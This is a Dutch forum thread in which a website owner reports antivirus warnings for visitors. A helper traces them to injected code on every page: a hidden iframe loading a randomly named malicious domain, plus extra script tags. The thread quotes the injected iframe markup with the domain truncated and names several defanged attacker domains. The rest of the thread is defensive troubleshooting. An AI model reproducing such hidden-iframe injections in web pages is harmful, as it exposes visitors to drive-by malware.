website met virusmelding

Status
Niet open voor verdere reacties.
Y

YankY67

Gebruiker
Lid geworden
23 jan 2010
Berichten
24
Hallo allemaal,

Ik weet niet of mijn vraag hier goed staat, maar dan wordt hij vast in het juiste topic geplaatst door de juiste mensen ;)

Ik heb al een poos een website in onderhoud, waar ik plots meldingen van bezoekers krijg dat er een virus in die site zou zitten.
Ik heb er geen scripts op staan, alleen een gastenboek van Bravenet.

Het gaat om de website http://www.cattery-baschach.nl

Ik heb er zelf geen last van, maar op mijn werk kreeg ik onderstaande melding
viruswaarschuwing.jpg


Weet iemand misschien een oplossing om uit te zoeken hoe ik die meldingen weg kan krijgen voor bezoekers?
 
Juist. Word er ergens een bestandsnaam wat de melding laat 'triggeren'? Want het is namelijk de website hxxp://ofgnrhiooxk.com (krijg hier ook netjes een virus-blokkering zodra ik die open).
 
Hoi Probleempjes
Ik denk dat je ergens een woord vergeten bent in je antwoord..

bedoel je of ik ergens een triggerwoord op haar site heb staan?
Hoe kan ik daar achter komen? Ik heb geen idee hoe het kan dat dit gebeurd. Heb dit nog nooit eerder meegemaakt
 
Niet een woord, maar een code, of bestand die je er zelf nooit hebt opgezet. Meestal krijg je bij zo'n melding ook een bestandsnaam te zien waar de infectie zit op de website. Ik heb al even op de betrefde website gekeken, en alle sub-pagina's geopend (ctrl+klik = nieuw tablad), maar kreeg zelf geen virus-blokkering, en er werd ook geen pagina geblokkeerd.

Wel zie ik nu in je screenshot dat deze website vermoend is, kan je kijken of je in 1 van de pagina's een code kan vinden waarin die pagina geladen zou moeten worden? (staat achter URL van aanvaller)
 
Het heeft even geduurd, maar nu snap ik je en ik heb de site laten zoeken in dreamweaver op dbcuqdpdfds.com maar hij heeft niets gevonden:confused:
 
Het is niet opgelost, maar sluit het topic maar.. ik ga de site opnieuw maken
 
Hoi YankY67,
Ik vermoed zomaar dat het toch in het Bravenet-gastenboek zit.
  • Dat staat namelijk niet helemaal bij Bravenet op de site, maar gedeeltelijk ook bij jou. Het script om deze pagina te maken wordt opgehaald bij Bravenet, waar ook de geposte input zal uithangen, die via het script op je pagina komt. Dit script (redelijk onleesbaar...) plaatst o.a. een <iframe> op de pagina voor de advertentie (op dit moment: de goksite-link "Bingo Room Las Vegas" met flash-plaatje). De pagina in het <iframe> zit wel bij Bravenet op de site, maar bestaat uit ... eigenlijk alleen maar een script: een "randomizer" die als advertentie-wisselaar dienst doet.
  • Al met al zou het m.i. best eens kunnen dat in één van deze toebehoren de boosdoener zit verscholen; die je er dan met zoeken op de boosdoener-sitenaam in DW niet uit kunt halen, want de virus-meldingspagina geeft die site als resultaat van de analyse van de aangetroffen codes (en dan kan het een terechte melding zijn of een "false positive").
Maar wat gebeurt er als je de gastenboek-pagina tijdelijk uit de site haalt?
Komt er dan nog steeds een virus-alarm?
Want opnieuw bouwen van de site lijkt me ook zo wat, als het niet aan je site zelf kan liggen.

Met vriendelijke groet,
CSShunter
_________
PS: Je andere cattery-site heeft er kennelijk geen last van: maar die heeft een ander gastenboek! :)

PS-2: Met Norman-AV en Spyware Terminator krijg ik geen melding. Wel na het bezoek aan de "besmette" site al mijn harde schijven stevig laten scannen door Malwarebytes Anti-Malware, voor alle veiligheid.
Maar na een tijdje zoemen van de kast: niets gevonden.
Waarschijnlijk geeft Norton een loos alarm, maar dat is wel pittig vervelend voor de bezoekers.
 
Laatst bewerkt:
Hoi CSSHunter,

Dank je wel voor je reactie. Ik ga even proberen om het gastenboek eraf te halen en kijken of het dan nog zo is.
Het klopt dat ik op een andere site een ander gastenboek heb. Ik wilde wel dezelfde gebruiken, maar mijn provider was niet blij met het gastenboek.
Ik denk ook dat ik zo wie zo een ander gastenboek er op ga zetten, maar ga dit eerst proberen.

Dank je wel voor het melden en nakijken.

Groetjes Yanky
 
Ik heb net de link en de hele map verwijdert, maar mijn moeder krijgt nog steeds de volgende melding

Staat u toe dat deze website een programma op u computer wordt geopend?
van: mhjldbgmfds.com
adres is: hcp://services/search?.... eindigend op system.info/main.htm

Ik zelf krijg de melding ook niet...

Mijn moeder heeft nog XP en daardoor IE8
Ik werk met IE9 en normaal gesproken chrome

Op mijn werk heb ik ook XP en dus ook IE8 en Chrome
Daar krijg ik ook de melding. Want daar is de screen bovein dit topic van

Denk toch dat ik de site helemaal moet verwijderen... en opnieuw moet maken
blz. voor blz. overleggen met mijn moeder, zodat ik weet wanneer en welke pagina een melding geeft

Ik krijg zelf ook geen melding,
 
ps. mijn moeder krijgt hem niet van Norton, maar van IE8
Op mijn werk, krijg ik de melding van Norton
 
Blijft allemaal wat merkwaardig:
  • Ik zie dat het Bravenet-gastenboek er nu uit is.
  • Bij IE7 op WinXP krijg ik niets.
  • Bij IE8 op WindowsServer2008: geen virusmelding, maar de boodschap dat voor deze pagina Java wordt gebruikt (geen javascript, maar java, staat er):
java-melding.png

Dit gebeurt meteen al op de homepage, en vervolgens ook op alle andere pagina's.
Maar ik kan helemaal niet traceren dat er in de pagina iets van Java staat. :shocked: Er wordt geen applet opgeroepen, enz.

Het enige dat ik nog kan ontdekken is:
Ik heb er geen scripts op staan, alleen een gastenboek van Bravenet.
Klik om te vergroten...
Dat klopt niet; op elke pagina wordt een script voor "Flash Player Version Detection" aangeroepen: www.cattery-baschach.nl/Scripts/AC_RunActiveContent.js. Maar dat lijkt me wel betrouwbaar, eigenlijk.

=====

HO, STOP!!!
Aha-aha-aha, er zijn nog meer scripts aan het lopen :shocked:, verklapt de Javascript-viewer van de Webdeveloper Toolbar van Firefox (wat is dat ding toch onmisbaar!):

js-info-toolbar.png


cattery-js.png


Whoeps! Waar komt dat vandaan? Niet uit je broncode, die is schoon.
Even kijken, weer met de Developer Toolbar, naar de "gegenereerde code" (dat is de html-code zoals die er uitziet nadat aanwezige javascripts zijn toegepast).

Het blijkt te kloppen!
In de <head> staan er nu opeens twee links naar scripts voor twitter:
HTML: 
<script src="http://api.twitter.com/1/trends/daily.json?callback=window.g_cd ...enz.>
<script src="http://api.twitter.com/1/trends/daily.json?date=2011-07-12&amp;callback= ... enz.>
En vlak voor het eind van de </body> zijn opeens 3 extra <div>'s toegevoegd: een losse, een verborgen div daarbinnen, en daar weer een <iframe> in.
HTML: 
<div>
<div id="d3" style="display: none; visibility: hidden;">
<div style="visibility: hidden;">
   <iframe src="http://miasclnm...(enz).com/index.php?tp=001e... enz." width="100" height="80"></iframe>
</div>
</div>
</div>
Die miasclnm...(enz).com heeft dan weer alle bovenstaande scripts op z'n geweten. Wat die scripts doen en in hoeverre ze kwaadaardig zijn, weet ik niet (onvoldoende deskundig).

Maar miasclnm...(enz).com is een grappenmaker... ga je daar rechtstreeks naar toe (moest ik even proberen), dan wordt je geredirect naar Google, waardoor het lijkt alsof die site niet bestaat!

Verder lijkt onze miasclnm...(enz).com wel treffend veel op de eerder door de virusmelding aangetroffen namen: ofgnrhiooxk, dbcuqdpdfds en mhjldbgmfds; ook al weer zo'n rare lettercombinatie.
Vermoedelijk wisselen ze om de haverklap van naam, en halen dan zo'n site weer uit de lucht; terwijl intussen het kwaad al geschied kan zijn...

Zo kom ik tot de conclusie: die virusmeldingen zijn toch niet zo gek.
Het ziet ernaar uit dat de site is geïnjecteerd met gespuis: gehackt!
Maar daar zal je zelf niets aan kunnen doen, dat ligt bij de provider, Progressix als ik me niet vergis.

Heb je die als eens een belletje gegeven of een mailtje gestuurd, met je bevindingen van de laatste tijd, enz. en de vraag of ze de server willen opschonen en een backup willen terugzetten?

Met vriendelijke groet,
CSShunter
___________
PS: Als je een pagina "hallo-world.htm", met verder niks er in, op de server daar zet, gaan er dan ook alarmbellen af? Dat zou m'n vermoeden ernstig bevestigen!
 
Laatst bewerkt:
Jeetje, wat ben jij goed aan het werk geweest zeg !!
Ongelofelijk wat je allemaal uitgevonden hebt. Super dat je dit hebt willen doen.

Ik heb inderdaad de provider al aangeschreven.. verschillende keren.. maar hun laatste optie was dus om de site opnieuw te maken

De profider heet HostFX (voorheen trans-it)

Ik ga ondertussen even de hele site eraf halen.. kan het er zo weer opzetten, omdat het op me pc staat en een pagina aanmaken zoals jij zegt
Dan geef ik even een seintje als ik dat gedaan heb.

Als jij die melding daarna nog hebt, zal ik jou ondervindingen naar HostFX toesturen
Geweldig man!! Dank je wel!!

Groetjes Yanky
 
oeps.. ik lees het verkeerd... je bedoeld gewoon een lege pagina aanmaken met hallo_world.htm
dat ga ik effe doen
 
Hoi YankY67,
Op dit moment geeft de hallo-world bij mij geen ingestopte scripts te zien.

Maar de site staat er nog steeds op, en die herbergt nog wel ongein. De link in het verstopte iframe met de script-bende gaat nu naar: cjirubmcfds (met com er achter).
We kunnen wel een bibliotheekje gaan oprichten van al die schuilnamen! ;)

Het hidden iframe zit trouwens niet alleen in de index.html, maar ook in het menu (leftframe.html), in mainframe.html en in Chanel.html, zie ik. Dus ik denk in alles. :confused:

Als je de site hebt leeggehaald (ook de index en de hallo-world er af), geef je dan even een seintje?
Kunnen we kijken of de lege site ook nog rariteiten uithaalt...
 
Hoi CSSHunter,
Ik heb alles eraf gehaald.. incl. index.. ben benieuwd

Groetjes Yanky
 
Hoi Yanky,
Die is inderdaad hartstikke leeg! :d
Er komt ook geen melding van de provider dat de site gereserveerd is of onder constructie (dat doen ze soms). Het enige wat je ziet is een 403-melding: "verboden hier te kijken", d.w.z. de normale boodschap als je een map wilt bekijken als dat niet zomaar mag.
En de 403-pagina heeft ook geen scripts enz. aan boord. Mooi!

Nu de volgende stap (het zal voetje voor voetje moeten): kan je er alleen de hallo-world.html er weer op zetten (met ook die naam)?
 
(was even boodschapje doen)

Mooi! Die geeft bij mij nog steeds geen alarm.
Nu de volgende stap, deze even aanmaken:
HTML: 
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" 
	"http://www.w3.org/TR/html4/strict.dtd">
<html lang="nl">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>index.html :: Hallo Virus</title>
</head>
<body>
<h1>index.html</h1>
<h2>dit is een testpagina</h2>
<p>Hallo virus! Bent u daar? ;-)</p>
</body>
</html>
En die dan vervolgens uploaden als index.html.

Ik ben benieuwd!
 
Status
Niet open voor verdere reacties.
                    Steun ons                    

Nieuwste berichten

Terug
Bovenaan Onderaan